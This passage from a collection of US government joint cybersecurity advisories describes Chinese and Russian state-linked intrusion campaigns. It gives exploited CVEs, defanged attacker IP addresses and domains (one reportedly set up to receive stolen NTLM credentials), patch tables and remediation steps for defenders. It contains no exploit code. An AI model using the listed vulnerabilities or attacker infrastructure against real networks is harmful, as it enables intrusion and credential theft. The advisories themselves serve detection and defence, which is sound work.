\n[CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)\n\n| \n\n * Pulse Connect Secure 9.0R1 - 9.0R3.3, 8.3R1 - 8.3R7, 8.2R1 - 8.2R12, 8.1R1 - 8.1R15\n\n * Pulse Policy Secure 9.0R1 - 9.0R3.1, 5.4R1 - 5.4R7, 5.3R1 - 5.3R12, 5.2R1 - 5.2R12, 5.1R1 - 5.1R15\n\n| \n\n * [Pulse Secure Out-of-Cycle Advisory: Multiple vulnerabilities resolved in Pulse Connect Secure / Pulse Policy Secure 9.0RX](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101>) \n \n[CVE-2020-0688](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>)\n\n| \n\n * Microsoft Exchange Servers\n\n| \n\n * [Microsoft Security Advisory: CVE-2020-0688: Microsoft Exchange Validation Key Remote Code Execution Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>) \n \nCISA and the FBI also recommend that organizations routinely audit their configuration and patch management programs to ensure they can track and mitigate emerging threats. Implementing a rigorous configuration and patch management program will hamper sophisticated cyber threat actors\u2019 operations and protect organizations\u2019 resources and information systems. \n\n### Contact Information\n\nTo report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at [www.fbi.gov/contact-us/field](<https://www.fbi.gov/contact-us/field-offices>), or the FBI\u2019s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at [CyWatch@fbi.gov](<mailto: CyWatch@fbi.gov>). When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at [central@cisa.dhs.gov](<mailto: Central@cisa.dhs.gov>).\n\n### References\n\n[[1] U.S. Department of Justice Press Release](<https://www.justice.gov/opa/pr/two-chinese-hackers-working-ministry-state-security-charged-global-computer-intrusion>)\n\n[[2] U.S. Department of Justice Press Release](<https://www.justice.gov/opa/pr/two-chinese-hackers-working-ministry-state-security-charged-global-computer-intrusion>)\n\n[[3] Shodan](<https://www.shodan.io>)\n\n[[4] MITRE Common Vulnerabilities and Exposures List](<https://cve.mitre.org>)\n\n[[5] National Institute of Standards and Technology National Vulnerability Database](<https://nvd.nist.gov/>)\n\n[[6] CISA Alert AA20-133A: Top 10 Routinely Exploited Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>)\n\n[[7] CISA Alert AA20-206A: Threat Actor Exploitation of F5 BIG-IP CVE-2020-5902](<https://us-cert.cisa.gov/ncas/alerts/aa20-206a>)\n\n[[8] CISA Alert AA20-031A: Detecting Citrix CVE-2019-19781](<https://us-cert.cisa.gov/ncas/alerts/aa20-031a>)\n\n[[9] CISA Alert AA20-107A: Continued Threat Actor Exploitation Post Pulse Secure VPN Patching](<https://us-cert.cisa.gov/ncas/alerts/aa20-107a>)\n\n[[10] GitHub](<https://www.GitHub.com>)\n\n[[11] Exploit-DB](<https://www.exploit-db.com/>)\n\n[[12] What is Mimikatz: The Beginner's Guide (VARONIS)](<https://www.varonis.com/blog/what-is-mimikatz/>)\n\n### Revisions\n\nSeptember 14, 2020: Initial Version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-10-24T12:00:00", "type": "ics", "title": "Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-0688", "CVE-2020-5902"], "modified": "2020-10-24T12:00:00", "id": "AA20-258A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-258a", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-03-14T18:33:59", "description": "### Summary\n\n_This joint cybersecurity advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&amp;CK\u00ae) framework. See the [ATT&amp;CK for Enterprise](<https://attack.mitre.org/versions/v7/>) framework for all referenced threat actor tactics and techniques _\n\nThis joint cybersecurity advisory\u2014written by the Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA)\u2014provides information on Russian state-sponsored advanced persistent threat (APT) actor activity targeting various U.S. state, local, territorial, and tribal (SLTT) government networks, as well as aviation networks. This advisory updates joint CISA-FBI cybersecurity advisory [AA20-283A: APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations](<https://us-cert.cisa.gov/ncas/alerts/aa20-283a>).\n\nSince at least September 2020, a Russian state-sponsored APT actor\u2014known variously as Berserk Bear, Energetic Bear, TeamSpy, Dragonfly, Havex, Crouching Yeti, and Koala in open-source reporting\u2014has conducted a campaign against a wide variety of U.S. targets. The Russian state-sponsored APT actor has targeted dozens of SLTT government and aviation networks, attempted intrusions at several SLTT organizations, successfully compromised network infrastructure, and as of October 1, 2020, exfiltrated data from at least two victim servers.\n\nThe Russian-sponsored APT actor is obtaining user and administrator credentials to establish initial access, enable lateral movement once inside the network, and locate high value assets in order to exfiltrate data. In at least one compromise, the APT actor laterally traversed an SLTT victim network and accessed documents related to:\n\n * Sensitive network configurations and passwords.\n * Standard operating procedures (SOP), such as enrolling in multi-factor authentication (MFA).\n * IT instructions, such as requesting password resets.\n * Vendors and purchasing information.\n * Printing access badges.\n\nTo date, the FBI and CISA have no information to indicate this APT actor has intentionally disrupted any aviation, education, elections, or government operations. However, the actor may be seeking access to obtain future disruption options, to influence U.S. policies and actions, or to delegitimize SLTT government entities.\n\nAs this recent malicious activity has been directed at SLTT government networks, there may be some risk to elections information housed on SLTT government networks. However, the FBI and CISA have no evidence to date that integrity of elections data has been compromised. Due to the heightened awareness surrounding elections infrastructure and the targeting of SLTT government networks, the FBI and CISA will continue to monitor this activity and its proximity to elections infrastructure.\n\n * Click here for a PDF version of this report.\n * Click here for a STIX package of IOCs.\n\n#### U.S. Heat Map of Activity\n\n[Click here](<https://indd.adobe.com/view/64463245-3411-49f9-b203-1c7cb8f16769>) for an interactive heat map of this activity (current as of November 17, 2020). Hovering the cursor over the map reveals the number and type of entities the Russian APT has targeted in each region. These totals include compromises, scanning, or other reconnaissance activity executed from the Russian APT actor infrastructure.\n\n**Note**: CISA is committed to providing access to our web pages and documents for individuals with disabilities, both members of the public and federal employees. If the format of any elements or content within this document interferes with your ability to access the information, as defined in the Rehabilitation Act, please email [info@us-cert.gov](<mailto: info@us-cert.gov>). To enable us to respond in a manner most helpful to you, please indicate the nature of your accessibility problem and the preferred format in which to receive the material.\n\n**Note**: the heat map has interactive features that may not work in your web browser. For best use, please download and save this catalog.\n\n### Technical Details\n\nThe FBI and CISA have observed Russian state-sponsored APT actor activity targeting U.S. SLTT government networks, as well as aviation networks. The APT actor is using Turkish IP addresses `213.74.101[.]65`, `213.74.139[.]196`, and `212.252.30[.]170` to connect to victim web servers (_Exploit Public Facing Application_ [[T1190](<https://attack.mitre.org/versions/v7/techniques/T1190/>)]).\n\nThe actor is using `213.74.101[.]65` and `213.74.139[.]196` to attempt brute force logins and, in several instances, attempted Structured Query Language (SQL) injections on victim websites (_Brute Force_ [[T1110](<https://attack.mitre.org/versions/v7/techniques/T1110>)]; _Exploit Public Facing Application_ [[T1190](<https://attack.mitre.org/versions/v7/techniques/T1190/>)]). The APT actor also hosted malicious domains, including possible aviation sector target `columbusairports.microsoftonline[.]host`, which resolved to `108.177.235[.]92` and `[cityname].westus2.cloudapp.azure.com`; these domains are U.S. registered and are likely SLTT government targets (_Drive-By Compromise _[[T1189](<https://attack.mitre.org/versions/v7/techniques/T1189>)]).\n\nThe APT actor scanned for vulnerable Citrix and Microsoft Exchange services and identified vulnerable systems, likely for future exploitation. This actor continues to exploit a Citrix Directory Traversal Bug ([CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)) and a Microsoft Exchange remote code execution flaw ([CVE-2020-0688](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>)).\n\nThe APT actor has been observed using Cisco AnyConnect Secure Socket Layer (SSL) virtual private network (VPN) connections to enable remote logins on at least one victim network, possibly enabled by an Exim Simple Mail Transfer Protocol (SMTP) vulnerability ([CVE 2019-10149](<https://nvd.nist.gov/vuln/detail/CVE-2019-10149>)) (_External Remote Services_ [[T1133](<https://attack.mitre.org/versions/v7/techniques/T1133>)]). More recently, the APT actor enumerated and exploited a Fortinet VPN vulnerability ([CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>)) for Initial Access [[TA0001](<https://attack.mitre.org/versions/v7/tactics/TA0001/>)] and a Windows Netlogon vulnerability ([CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>)) to obtain access to Windows Active Directory (AD) servers for Privilege Escalation [[TA0004](<https://attack.mitre.org/versions/v7/tactics/TA0004/>)] within the network (_Valid Accounts_ [[T1078](<https://attack.mitre.org/versions/v7/techniques/T1078>)]). These vulnerabilities can also be leveraged to compromise other devices on the network (_Lateral Movement_ [[TA0008](<https://attack.mitre.org/versions/v7/tactics/TA0008/>)]) and to maintain _Persistence_ [[TA0003](<https://attack.mitre.org/versions/v7/tactics/TA0003/>)]).\n\nBetween early February and mid-September, these APT actors used `213.74.101[.]65`, `212.252.30[.]170`, `5.196.167[.]184`, `37.139.7[.]16`, `149.56.20[.]55`, `91.227.68[.]97`, and `5.45.119[.]124` to target U.S. SLTT government networks. Successful authentications\u2014including the compromise of Microsoft Office 365 (O365) accounts\u2014have been observed on at least one victim network (_Valid Accounts_ [[T1078](<https://attack.mitre.org/versions/v7/techniques/T1078>)]).\n\n### Mitigations\n\n#### Indicators of Compromise\n\nThe APT actor used the following IP addresses and domains to carry out its objectives:\n\n * `213.74.101[.]65`\n * `213.74.139[.]196`\n * `212.252.30[.]170`\n * `5.196.167[.]184`\n * `37.139.7[.]16`\n * `149.56.20[.]55`\n * `91.227.68[.]97`\n * `138.201.186[.]43`\n * `5.45.119[.]124`\n * `193.37.212[.]43`\n * `146.0.77[.]60`\n * `51.159.28[.]101`\n * `columbusairports.microsoftonline[.]host`\n * `microsoftonline[.]host`\n * `email.microsoftonline[.]services`\n * `microsoftonline[.]services`\n * `cityname[.]westus2.cloudapp.azure.com`\n\nIP address `51.159.28[.]101` appears to have been configured to receive stolen Windows New Technology Local Area Network Manager (NTLM) credentials. FBI and CISA recommend organizations take defensive actions to mitigate the risk of leaking NTLM credentials; specifically, organizations should disable NTLM or restrict outgoing NTLM. Organizations should consider blocking IP address `51.159.28[.]101` (although this action alone may not mitigate the threat, as the APT actor has likely established, or will establish, additional infrastructure points).\n\nOrganizations should check available logs for traffic to/from IP address `51.159.28[.]101` for indications of credential-harvesting activity. As the APT actors likely have\u2014or will\u2014establish additional infrastructure points, organizations should also monitor for Server Message Block (SMB) or WebDAV activity leaving the network to other IP addresses.\n\nRefer to AA20-296A.stix for a downloadable copy of IOCs.\n\n#### Network Defense-in-Depth\n\nProper network defense-in-depth and adherence to information security best practices can assist in mitigating the threat and reducing the risk to critical infrastructure. The following guidance may assist organizations in developing network defense procedures.\n\n * Keep all applications updated according to vendor recommendations, and especially prioritize updates for external facing applications and remote access services to address CVE-2019-19781, CVE-2020-0688, CVE 2019-10149, CVE-2018-13379, and CVE-2020-1472. Refer to table 1 for patch information on these CVEs.\n\n_Table 1: Patch information for CVEs_\n\n**Vulnerability** | **Vulnerable Products** | **Patch Information** \n---|---|--- \n[CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) | \n\n * Citrix Application Delivery Controller\n * Citrix Gateway\n * Citrix SDWAN WANOP\n\n| \n\n[Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 11.1 and 12.0](<https://www.citrix.com/blogs/2020/01/19/vulnerability-update-first-permanent-fixes-available-timeline-accelerated/>)\n\n[Citrix blog post: security updates for Citrix SD-WAN WANOP release 10.2.6 and 11.0.3](<https://www.citrix.com/blogs/2020/01/22/update-on-cve-2019-19781-fixes-now-available-for-citrix-sd-wan-wanop/>)\n\n[Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 12.1 and 13.0](<https://www.citrix.com/blogs/2020/01/23/fixes-now-available-for-citrix-adc-citrix-gateway-versions-12-1-and-13-0/>)\n\n[Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway version 10.5](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>) \n \n[CVE-2020-0688](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>) | \n\n * Microsoft Exchange Server 2010 Service Pack 3 Update Rollup 30\n * Microsoft Exchange Server 2013 Cumulative Update 23\n * Microsoft Exchange Server 2016 Cumulative Update 14\n * Microsoft Exchange Server 2016 Cumulative Update 15\n * Microsoft Exchange Server 2019 Cumulative Update 3\n * Microsoft Exchange Server 2019 Cumulative Update 4\n\n| [Microsoft Security Advisory for CVE-2020-0688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>) \n[CVE-2019-10149](<https://nvd.nist.gov/vuln/detail/CVE-2019-10149>) | \n\n * Exim versions 4.87\u20134.91\n| [Exim page for CVE-2019-10149](<https://www.exim.org/static/doc/security/CVE-2019-10149.txt>) \n[CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) | \n\n * FortiOS 6.0: 6.0.0 to 6.0.4\n * FortiOS 5.6: 5.6.3 to 5.6.7\n * FortiOS 5.4: 5.4.6 to 5.4.12\n| [Fortinet Security Advisory: FG-IR-18-384](<https://www.fortiguard.com/psirt/FG-IR-18-384>) \n[CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>) | \n\n * Windows Server 2008 R2 for x64-based Systems Service Pack 1\n * Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)\n * Windows Server 2012\n * Windows Server 2012 (Server Core installation)\n * Windows Server 2012 R2\n * Windows Server 2016\n * Windows Server 2019\n * Windows Server 2019 (Server Core installation)\n * Windows Server, version 1903 (Server Core installation)\n * Windows Server, version 1909 (Server Core installation)\n * Windows Server, version 2004 (Server Core installation)\n| \n\n[Microsoft Security Advisory for CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>) \n \n * Follow Microsoft\u2019s [guidance](<https://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc>) on monitoring logs for activity related to the Netlogon vulnerability, CVE-2020-1472.\n * If appropriate for your organization\u2019s network, prevent external communication of all versions of SMB and related protocols at the network boundary by blocking Transmission Control Protocol (TCP) ports 139 and 445 and User Datagram Protocol (UDP) port 137. See the CISA publication on [SMB Security Best Practices](<https://us-cert.cisa.gov/ncas/current-activity/2017/01/16/SMB-Security-Best-Practices>) for more information.\n * Implement the prevention, detection, and mitigation strategies outlined in: \n * CISA Alert [TA15-314A \u2013 Compromised Web Servers and Web Shells \u2013 Threat Awareness and Guidance](<https://us-cert.cisa.gov/ncas/alerts/TA15-314A>).\n * National Security Agency Cybersecurity Information Sheet [U/OO/134094-20 \u2013 Detect and Prevent Web Shells Malware](<https://www.nsa.gov/News-Features/News-Stories/Article-View/Article/2159419/detect-prevent-cyber-attackers-from-exploiting-web-servers-via-web-shell-malware/>).\n * Isolate external facing services in a network demilitarized zone (DMZ) since they are more exposed to malicious activity; enable robust logging, and monitor the logs for signs of compromise.\n * Establish a training mechanism to inform end users on proper email and web usage, highlighting current information and analysis and including common indicators of phishing. End users should have clear instructions on how to report unusual or suspicious emails.\n * Implement application controls to only allow execution from specified application directories. System administrators may implement this through Microsoft Software Restriction Policy, AppLocker, or similar software. Safe defaults allow applications to run from `PROGRAMFILES`, `PROGRAMFILES(X86)`, and `WINDOWS` folders. All other locations should be disallowed unless an exception is granted.\n * Block Remote Desktop Protocol (RDP) connections originating from untrusted external addresses unless an exception exists; routinely review exceptions on a regular basis for validity.\n\n#### Comprehensive Account Resets\n\nFor accounts where NTLM password hashes or Kerberos tickets may have been compromised (e.g., through CVE-2020-1472), a double-password-reset may be required in order to prevent continued exploitation of those accounts. For domain-admin-level credentials, a reset of KRB-TGT \u201cGolden Tickets\u201d may be required, and Microsoft has released specialized [guidance](<https://docs.microsoft.com/en-us/azure-advanced-threat-protection/domain-dominance-alerts>) for this. Such a reset should be performed very carefully if needed.\n\nIf there is an observation of [CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>) Netlogon activity or other indications of valid credential abuse, it should be assumed the APT actors have compromised AD administrative accounts. In such cases, the AD forest should not be fully trusted, and, therefore, a new forest should be deployed. Existing hosts from the old compromised forest cannot be migrated in without being rebuilt and rejoined to the new domain, but migration may be done through \u201ccreative destruction,\u201d wherein, as endpoints in the legacy forest are decommissioned, new ones can be built in the new forest. This will need to be completed in on-premise\u2014as well as in Azure-hosted\u2014AD instances.\n\nNote that fully resetting an AD forest is difficult and complex; it is best done with the assistance of personnel who have successfully completed the task previously.\n\nIt is critical to perform a full password reset on all user and computer accounts in the AD forest. Use the following steps as a guide.\n\n 1. Create a temporary administrator account, and use this account only for all administrative actions\n 2. Reset the Kerberos Ticket Granting Ticket `(krbtgt`) password;[[1](<https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/manage/ad-forest-recovery-resetting-the-krbtgt-password>)] this must be completed before any additional actions (a second reset will take place in step 5)\n 3. Wait for the `krbtgt` reset to propagate to all domain controllers (time may vary)\n 4. Reset all account passwords (passwords should be 15 characters or more and randomly assigned): \n\n 1. User accounts (forced reset with no legacy password reuse)\n 2. Local accounts on hosts (including local accounts not covered by Local Administrator Password Solution [LAPS])\n 3. Service accounts\n 4. Directory Services Restore Mode (DSRM) account\n 5. Domain Controller machine account\n 6. Application passwords\n 5. Reset the` krbtgt` password again\n 6. Wait for the `krbtgt` reset to propagate to all domain controllers (time may vary)\n 7. Reboot domain controllers\n 8. Reboot all endpoints\n\nThe following accounts should be reset:\n\n * AD Kerberos Authentication Master (2x)\n * All Active Directory Accounts\n * All Active Directory Admin Accounts\n * All Active Directory Service Accounts\n * All Active Directory User Accounts\n * DSRM Account on Domain Controllers\n * Non-AD Privileged Application Accounts\n * Non-AD Unprivileged Application Accounts\n * Non-Windows Privileged Accounts\n * Non-Windows User Accounts\n * Windows Computer Accounts\n * Windows Local Admin\n\n#### VPN Vulnerabilities\n\nImplement the following recommendations to secure your organization\u2019s VPNs:\n\n * **Update VPNs, network infrastructure devices, and devices** being used to remote into work environments with the latest software patches and security configurations. See CISA Tips [Understanding Patches and Software Updates](<https://us-cert.cisa.gov/ncas/tips/ST04-006>) and [Securing Network Infrastructure Devices](<https://us-cert.cisa.gov/ncas/tips/ST18-001>). Wherever possible, enable automatic updates.\n * **Implement MFA on all VPN connections to increase security**. Physical security tokens are the most secure form of MFA, followed by authenticator app-based MFA. SMS and email-based MFA should only be used when no other forms are available. If MFA is not implemented, require teleworkers to use strong passwords. See CISA Tips [Choosing and Protecting Passwords](<https://us-cert.cisa.gov/ncas/tips/ST04-002>) and [Supplementing Passwords](<https://us-cert.cisa.gov/ncas/tips/ST05-012>) for more information.\n\nDiscontinue unused VPN servers. Reduce your organization\u2019s attack surface by discontinuing unused VPN servers, which may act as a point of entry for attackers. To protect your organization against VPN vulnerabilities:\n\n * **Audit **configuration and patch management programs.\n * **Monitor **network traffic for unexpected and unapproved protocols, especially outbound to the Internet (e.g., Secure Shell [SSH], SMB, RDP).\n * **Implement** MFA, especially for privileged accounts.\n * **Use** separate administrative accounts on separate administration workstations.\n * **Keep **[software up to date](<https://us-cert.cisa.gov/ncas/tips/ST04-006>). Enable automatic updates, if available.\n\n### Contact Information\n\nTo report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at [www.fbi.gov/contact-us/field](<http://www.fbi.gov/contact-us/field>), or the FBI\u2019s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at [CyWatch@fbi.gov](<mailto:CyWatch@fbi.gov>). When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at [Central@cisa.dhs.gov](<mailto:Central@cisa.dhs.gov>).\n\n### Resources\n\n * APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations \u2013 <https://us-cert.cisa.gov/ncas/alerts/aa20-283a>\n * CISA Activity Alert CVE-2019-19781 \u2013 <https://us-cert/cisa.gov/ncas/alerts/aa20-031a>\n * CISA Vulnerability Bulletin \u2013 <https://us-cert/cisa.gov/ncas/bulletins/SB19-161>\n * CISA Current Activity \u2013 <https://us-cert.cisa.gov/ncas/current-activity/2020/03/10/unpatched-microsoft-exchange-servers-vulnerable-cve-2020-0688>\n * Citrix Directory Traversal Bug (CVE-2019-19781) \u2013 <https://nvd.nist.gov/vuln/detail/CVE-2019-19781>\n * Microsoft Exchange remote code execution flaw (CVE-2020-0688) \u2013 <https://nvd.nist.gov/vuln/detail/CVE-2020-0688>\n * CVE-2018-13379 \u2013 [https://nvd.nist.gov/vuln/detail/CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379 >)\n * CVE-2020-1472 \u2013 <https://nvd.nist.gov/vuln/detail/CVE-2020-1472>\n * CVE 2019-10149 \u2013 <https://nvd.nist.gov/vuln/detail/CVE-2019-10149>\n * NCCIC/USCERT Alert TA15-314A \u2013 Compromised Web Servers and Web Shells \u2013 Threat Awareness and Guidance \u2013 [https://us-cert.cisa.gov/ncas/alerts/TA15-314A](<https://us-cert.cisa.gov/ncas/alerts/TA15-314A >)\n * NCCIC/US-CERT publication on SMB Security Best Practices \u2013 <https://us-cert.cisa.gov/ncas/current-activity/2017/01/16/SMB-Security-Best-Practices> \n\n\n**_DISCLAIMER_**\n\n_This information is provided \"as is\" for informational purposes only. The United States Government does not provide any warranties of any kind regarding this information. In no event shall the United States Government or its contractors or subcontractors be liable for any damages, including but not limited to, direct, indirect, special or consequential damages, arising out of, resulting from, or in any way connected with this information, whether or not based upon warranty, contract, tort, or otherwise, whether or not arising out of negligence, and whether or not injury was sustained from, or arose out of the results of, or reliance upon the information._\n\n_The United States Government does not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by the United States Government._\n\n### References\n\n[[1] Microsoft: AD Forest Recovery - Resetting the krbtgt password](<https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/manage/ad-forest-recovery-resetting-the-krbtgt-password>)\n\n### Revisions\n\nOctober 22, 2020: Initial Version|November 17, 2020: Added U.S. Heat Map of Activity|December 1, 2020: Added \"current as of\" date to U.S. Heat Map of Activity\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-12-01T12:00:00", "type": "ics", "title": "Russian State-Sponsored Advanced Persistent Threat Actor Compromises U.S. Government Targets", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-10149", "CVE-2019-19781", "CVE-2020-0688", "CVE-2020-1472"], "modified": "2020-12-01T12:00:00", "id": "AA20-296A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-296a", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-03-14T18:28:44", "description": "### Summary\n\n_**Actions Critical Infrastructure Organizations Should Implement to Immediately Strengthen Their Cyber Posture.** \n\u2022 Patch all systems. Prioritize patching [known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>)._ \n\u2022 Implement [multi-factor authentication](<https://us-cert.cisa.gov/ncas/tips/ST05-012>). \n\u2022 _Use antivirus software._ \n_\u2022 Develop internal contact lists and surge support._\n\n___**Note:** this advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&amp;CK\u00ae) framework, version 10. See the [ATT&amp;CK for Enterprise](<https://attack.mitre.org/versions/v9/techniques/enterprise/>) for all referenced threat actor tactics and techniques.___\n\nThis joint Cybersecurity Advisory (CSA)\u2014authored by the Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), and National Security Agency (NSA)\u2014is part of our continuing cybersecurity mission to warn organizations of cyber threats and help the cybersecurity community reduce the risk presented by these threats. This CSA provides an overview of Russian state-sponsored cyber operations; commonly observed tactics, techniques, and procedures (TTPs); detection actions; incident response guidance; and mitigations. This overview is intended to help the cybersecurity community reduce the risk presented by these threats.\n\nCISA, the FBI, and NSA encourage the cybersecurity community\u2014especially critical infrastructure network defenders\u2014to adopt a heightened state of awareness and to conduct proactive threat hunting, as outlined in the Detection section. Additionally, CISA, the FBI, and NSA strongly urge network defenders to implement the recommendations listed below and detailed in the Mitigations section. These mitigations will help organizations improve their functional resilience by reducing the risk of compromise or severe business degradation.\n\n 1. **Be prepared**. Confirm reporting processes and minimize personnel gaps in IT/OT security coverage. Create, maintain, and exercise a cyber incident response plan, resilience plan, and continuity of operations plan so that critical functions and operations can be kept running if technology systems are disrupted or need to be taken offline.\n 2. **Enhance your organization\u2019s cyber posture**. Follow best practices for identity and access management, protective controls and architecture, and vulnerability and configuration management.\n 3. **Increase organizational vigilance**. Stay current on reporting on this threat. [Subscribe](<https://public.govdelivery.com/accounts/USDHSCISA/subscriber/new?qsp=CODE_RED>) to CISA\u2019s [mailing list and feeds](<https://www.cisa.gov/uscert/mailing-lists-and-feeds>) to receive notifications when CISA releases information about a security topic or threat.\n\nCISA, the FBI, and NSA encourage critical infrastructure organization leaders to review CISA Insights: [Preparing for and Mitigating Cyber Threats](<https://cisa.gov/sites/default/files/publications/CISA_INSIGHTS-Preparing_For_and_Mitigating_Potential_Cyber_Threats-508C.pdf>) for information on reducing cyber threats to their organization.\n\nClick here for a PDF version of this report.\n\n### Technical Details\n\nHistorically, Russian state-sponsored advanced persistent threat (APT) actors have used common but effective tactics\u2014including spearphishing, brute force, and exploiting known vulnerabilities against accounts and networks with weak security\u2014to gain initial access to target networks. Vulnerabilities known to be exploited by Russian state-sponsored APT actors for initial access include:\n\n * [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) FortiGate VPNs\n * [CVE-2019-1653](<https://nvd.nist.gov/vuln/detail/CVE-2019-1653>) Cisco router\n * [CVE-2019-2725](<https://nvd.nist.gov/vuln/detail/CVE-2019-2725>) Oracle WebLogic Server\n * [CVE-2019-7609](<https://nvd.nist.gov/vuln/detail/CVE-2019-7609>) Kibana\n * [CVE-2019-9670](<https://nvd.nist.gov/vuln/detail/CVE-2019-9670>) Zimbra software\n * [CVE-2019-10149](<https://nvd.nist.gov/vuln/detail/CVE-2019-10149>) Exim Simple Mail Transfer Protocol\n * [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) Pulse Secure\n * [CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) Citrix\n * [CVE-2020-0688 ](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>)Microsoft Exchange\n * [CVE-2020-4006](<https://nvd.nist.gov/vuln/detail/CVE-2020-4006>) VMWare (note: this was a zero-day at time.)\n * [CVE-2020-5902 ](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>)F5 Big-IP\n * [CVE-2020-14882](<https://nvd.nist.gov/vuln/detail/CVE-2020-14882>) Oracle WebLogic\n * [CVE-2021-26855 ](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>)Microsoft Exchange (Note: this vulnerability is frequently observed used in conjunction with [CVE-2021-26857](<https://nvd.nist.gov/vuln/detail/CVE-2021-26857>), [CVE-2021-26858](<https://nvd.nist.gov/vuln/detail/CVE-2021-26858>), and 